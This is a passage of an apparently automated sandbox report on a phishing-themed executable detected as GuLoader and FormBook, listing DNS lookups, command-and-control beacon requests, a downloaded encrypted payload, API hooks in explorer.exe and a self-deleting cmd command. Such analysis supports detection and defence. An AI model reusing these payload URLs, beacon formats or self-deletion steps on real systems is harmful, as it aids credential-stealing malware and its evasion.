                                    Sep 13, 2021 22:59:09.803823948 CEST | 8.8.8.8 | 192.168.2.4 | 0xd210 | No error (0) | www.taylormakeyourlife.com | taylormakeyourlife.com | | CNAME (Canonical name) | IN (0x0001)
                                    Sep 13, 2021 22:59:09.803823948 CEST | 8.8.8.8 | 192.168.2.4 | 0xd210 | No error (0) | taylormakeyourlife.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:59:30.619622946 CEST | 8.8.8.8 | 192.168.2.4 | 0x23c5 | No error (0) | www.rlmwebcreations.com | | 209.99.40.222 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 22:59:51.462614059 CEST | 8.8.8.8 | 192.168.2.4 | 0x8a61 | No error (0) | www.beckyhartpcpublishers.com | beckyhartpcpublishers.com | | CNAME (Canonical name) | IN (0x0001)
                                    Sep 13, 2021 22:59:51.462614059 CEST | 8.8.8.8 | 192.168.2.4 | 0x8a61 | No error (0) | beckyhartpcpublishers.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:11.817277908 CEST | 8.8.8.8 | 192.168.2.4 | 0x2871 | Name error (3) | www.dominionhavanese.com | none | none | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:34.258972883 CEST | 8.8.8.8 | 192.168.2.4 | 0x7fe4 | No error (0) | www.microsoftjob.com | | 91.195.240.117 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:00:54.682140112 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b4 | No error (0) | www.wxsjykj.com | | 142.111.236.6 | A (IP address) | IN (0x0001)
                                    Sep 13, 2021 23:01:15.464034081 CEST | 8.8.8.8 | 192.168.2.4 | 0xafef | No error (0) | www.acooll.com | | 54.65.172.3 | A (IP address) | IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.paulassinkarchitect.nl
                                    • www.everythingswallow.com
                                    • www.priorpublic.com
                                    • www.taylormakeyourlife.com
                                    • www.rlmwebcreations.com
                                    • www.beckyhartpcpublishers.com
                                    • www.microsoftjob.com
                                    • www.wxsjykj.com
                                    • www.acooll.com

                                    HTTP Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.4 | 49817 | 91.184.0.38 | 443 | C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Timestamp | kBytes transferred | Direction | Data


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.4 | 49824 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 22:58:27.605200052 CEST | 6398 | OUT | GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.everythingswallow.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:58:27.631504059 CEST | 6398 | IN | HTTP/1.1 302 Found
                                    Connection: close
                                    Pragma: no-cache
                                    cache-control: no-cache
                                    Location: /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.4 | 49825 | 44.227.76.166 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 22:58:49.083899975 CEST | 6399 | OUT | GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.priorpublic.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:58:49.279829025 CEST | 6400 | IN | HTTP/1.1 307 Temporary Redirect
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:58:49 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 168
                                    Connection: close
                                    Location: http://priorpublic.com
                                    X-Frame-Options: sameorigin
                                    Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    3 | 192.168.2.4 | 49826 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 22:59:10.170882940 CEST | 6400 | OUT | GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.taylormakeyourlife.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:10.286118984 CEST | 6401 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:59:10 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139efab-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    4 | 192.168.2.4 | 49828 | 209.99.40.222 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 22:59:30.761007071 CEST | 6410 | OUT | GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.rlmwebcreations.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:31.018428087 CEST | 6411 | IN | HTTP/1.1 200 OK
                                    Date: Mon, 13 Sep 2021 20:59:30 GMT
                                    Server: Apache
                                    Set-Cookie: vsid=926vr3791123708943082; expires=Sat, 12-Sep-2026 20:59:30 GMT; Max-Age=157680000; path=/; domain=www.rlmwebcreations.com; HttpOnly
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_assyLbloNuqAuT9yOs607G/9j2VQECfmj/BBuVcpOg5A+7oWBME12E6QRlSicTWD8nJwG09ixi6T+2IGDnAxzw==
                                    Keep-Alive: timeout=5, max=122
                                    Connection: Keep-Alive
                                    Transfer-Encoding: chunked
                                    Content-Type: text/html; charset=UTF-8
                                    Data Ascii: 5a8f<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.rlmwebcreations.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.rlmwebcreations.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.rlmwebcreations.com/sk-logabpstatus.php?a=UkZiVWwrUzRrVzB5T0lNY0JRMEJ1VmFTVEZFS0dqQm1SRFN4c0Ftc3dDcFFkbkFORVNZTDV4UjJhVWU1YUdrK2JsMUpjWlUwdEViZzJWNWllLzlxMktGaWsxTnlINitTSXlBdDBtYTFYZFdLZ1ZxalJpS3J2YTRoUGw5SHl3UkM=&b="+ab


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    5 | 192.168.2.4 | 49829 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 22:59:51.481781960 CEST | 6435 | OUT | GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.beckyhartpcpublishers.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 22:59:51.597714901 CEST | 6436 | IN | HTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Mon, 13 Sep 2021 20:59:51 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "6139ed55-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    6 | 192.168.2.4 | 49830 | 91.195.240.117 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 23:00:34.279469013 CEST | 6437 | OUT | GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.microsoftjob.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:00:34.313590050 CEST | 6437 | IN | HTTP/1.1 403 Forbidden
                                    Date: Mon, 13 Sep 2021 21:00:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Pragma: no-cache
                                    Last-Modified: Mon, 13 Sep 2021 21:00:34 GMT
                                    X-Cache-Miss-From: parking-686859db59-mzj7x
                                    Server: NginX
                                    Data Ascii: 35The content of the page cannot be displayed...b3-->0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    7 | 192.168.2.4 | 49831 | 142.111.236.6 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 23:00:54.854407072 CEST | 6438 | OUT | GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.wxsjykj.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:00:55.025338888 CEST | 6439 | IN | HTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Mon, 13 Sep 2021 21:01:26 GMT
                                    Content-Type: text/html
                                    Content-Length: 146
                                    Connection: close
                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    8 | 192.168.2.4 | 49832 | 54.65.172.3 | 80 | C:\Windows\explorer.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Sep 13, 2021 23:01:15.723453045 CEST | 6439 | OUT | GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1
                                    Host: www.acooll.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Sep 13, 2021 23:01:15.978889942 CEST | 6441 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Mon, 13 Sep 2021 21:01:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Data Ascii: a2b<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>www.acooll.com is Expired or Suspended.</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="robots" content="noindex" />...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink" rel="nofollow"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p></p></h1><div><p class="txt01"> <span>www.acooll.com</span> <br><a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow"></a></


                                    HTTPS Proxied Packets

                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    0 | 192.168.2.4 | 49817 | 91.184.0.38 | 443 | C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    2021-09-13 20:56:57 UTC | 0 | OUT | GET /bin_fDiyu115.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: www.paulassinkarchitect.nl
                                    Cache-Control: no-cache
                                    2021-09-13 20:56:57 UTC | 0 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.1
                                    Date: Mon, 13 Sep 2021 20:56:57 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 185920
                                    Last-Modified: Mon, 13 Sep 2021 14:04:24 GMT
                                    Connection: close
                                    ETag: "613f5a68-2d640"
                                    Accept-Ranges: bytes
                                    Data Ascii: t*<k/J.cV$#!W]goccE5eO&_7'JGpK2f^d"Bfnn2qMZ;$QiNuOTcP'PmNSNq2ov7Z L`Cg%+Qoi2w7we]&qd.TygWMT8m
                                    2021-09-13 20:56:57 UTC176INData Raw: f5 b7 3e 0c e9 08 bd 1a 59 21 27 36 83 92 56 9c 38 cf 21 1c d1 d5 38 ca e7 a6 20 c3 cf 26 d3 a2 46 ea 62 95 d5 38 68 a7 be ab 8b b4 35 0c 54 25 72 b2 0a 64 a6 af 0f d6 19 c6 d5 86 58 e9 2b 02 87 56 bf c8 46 a2 3e e5 a7 ea 59 47 77 70 07 b8 b4 07 c6 dc aa f4 e6 9b 3f 2a 1d 26 64 1d 7f 9a 80 b8 f9 e2 d6 b8 48 f9 e6 ef bc aa ac 03 5b c3 43 a3 62 b2 8b 25 93 80 74 8a ba b1 13 bf 4e 0c bd 70 78 ff 92 fe 21 0e 25 d2 6f 2b b5 97 fe 36 a4 a3 38 d8 b9 46 a2 06 88 50 ef 0c c5 7a 73 59 4a 86 45 78 75 26 d2 e0 c2 73 0e bb 0d bb f5 e8 35 3f ec 83 53 18 da 25 cf b0 eb bc 90 55 4d cc 77 6c 48 65 81 a3 8d 95 5b e8 85 f2 17 62 60 38 d7 8d 6e c7 82 61 e9 a3 0e f8 ed f4 b8 9a 42 1c f1 33 59 04 dc b3 b5 7c 8f 3f 81 c7 0e 52 ff 6b dc 54 09 01 d8 ed b7 5b 65 17 1f 83 a0 2e 9a
                                    Data Ascii: >Y!'6V8!8 &Fb8h5T%rdX+VF>YGwp?*&dH[Cb%tNpx!%o+68FPzsYJExu&s5?S%UMwlHe[b`8naB3Y|?RkT[e.


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function Name    Hook Type    Active in Processes
                                    PeekMessageA     INLINE       explorer.exe
                                    PeekMessageW     INLINE       explorer.exe
                                    GetMessageW      INLINE       explorer.exe
                                    GetMessageA      INLINE       explorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function Name    Hook Type    New Data
                                    PeekMessageA     INLINE       0x48 0x8B 0xB8 0x8E 0xEE 0xE2
                                    PeekMessageW     INLINE       0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                    GetMessageW      INLINE       0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                    GetMessageA      INLINE       0x48 0x8B 0xB8 0x8E 0xEE 0xE2

                                    Statistics

                                    Behavior


                                    System Behavior

                                    General

                                    Start time: 22:52:50
                                    Start date: 13/09/2021
                                    Path: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Wow64 process (32bit): true
                                    Commandline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase: 0x400000
                                    File size: 466944 bytes
                                    MD5 hash: E8BCEEA59B2074BD08BF68AB55ECDF3E
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: Visual Basic
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                                    Reputation: low

                                    General

                                    Start time: 22:54:55
                                    Start date: 13/09/2021
                                    Path: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
                                    Wow64 process (32bit): true
                                    Commandline: 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase: 0x400000
                                    File size: 466944 bytes
                                    MD5 hash: E8BCEEA59B2074BD08BF68AB55ECDF3E
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation: low

                                    General

                                    Start time: 22:56:58
                                    Start date: 13/09/2021
                                    Path: C:\Windows\explorer.exe
                                    Wow64 process (32bit): false
                                    Commandline: C:\Windows\Explorer.EXE
                                    Imagebase: 0x7ff6fee60000
                                    File size: 3933184 bytes
                                    MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation: high

                                    General

                                    Start time: 22:57:25
                                    Start date: 13/09/2021
                                    Path: C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit): true
                                    Commandline: C:\Windows\SysWOW64\rundll32.exe
                                    Imagebase: 0x10e0000
                                    File size: 61952 bytes
                                    MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Yara matches:
                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, Author: Florian Roth
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, Author: Florian Roth
                                    Reputation: high

                                    General

                                    Start time: 22:57:30
                                    Start date: 13/09/2021
                                    Path: C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit): true
                                    Commandline: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
                                    Imagebase: 0x11d0000
                                    File size: 232960 bytes
                                    MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Reputation: high

                                    General

                                    Start time: 22:57:31
                                    Start date: 13/09/2021
                                    Path: C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit): false
                                    Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase: 0x7ff724c50000
                                    File size: 625664 bytes
                                    MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges: true
                                    Has administrator privileges: true
                                    Programmed in: C, C++ or other language
                                    Reputation: high

                                    Disassembly

                                    Code Analysis
